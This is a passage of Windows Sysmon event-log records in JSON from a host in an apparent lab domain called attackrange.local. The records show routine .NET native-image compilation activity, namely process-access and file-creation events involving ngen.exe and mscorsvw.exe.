{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-00100CB10B00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-00100CB10B00}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.085\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-001094B40B00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.085","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-001094B40B00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.085\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-001094B40B00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.085","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-001094B40B00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-001094B40B00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-001094B40B00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:12.226\r\nProcessGuid: {41C8662E-2238-5F25-0000-001094B40B00}\r\nProcessId: 2516\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d4-0\\Microsoft.Build.Conversion.v4.0.dll\r\nCreationUtcTime: 2020-08-01 08:05:12.226","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:12.226","ProcessGuid":"{41C8662E-2238-5F25-0000-001094B40B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d4-0\\Microsoft.Build.Conversion.v4.0.dll","CreationUtcTime":"2020-08-01 08:05:12.226","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.257\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.257","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00103DF20A00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.257\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.257","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00103DF20A00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00103DF20A00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-0010B0020B00}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 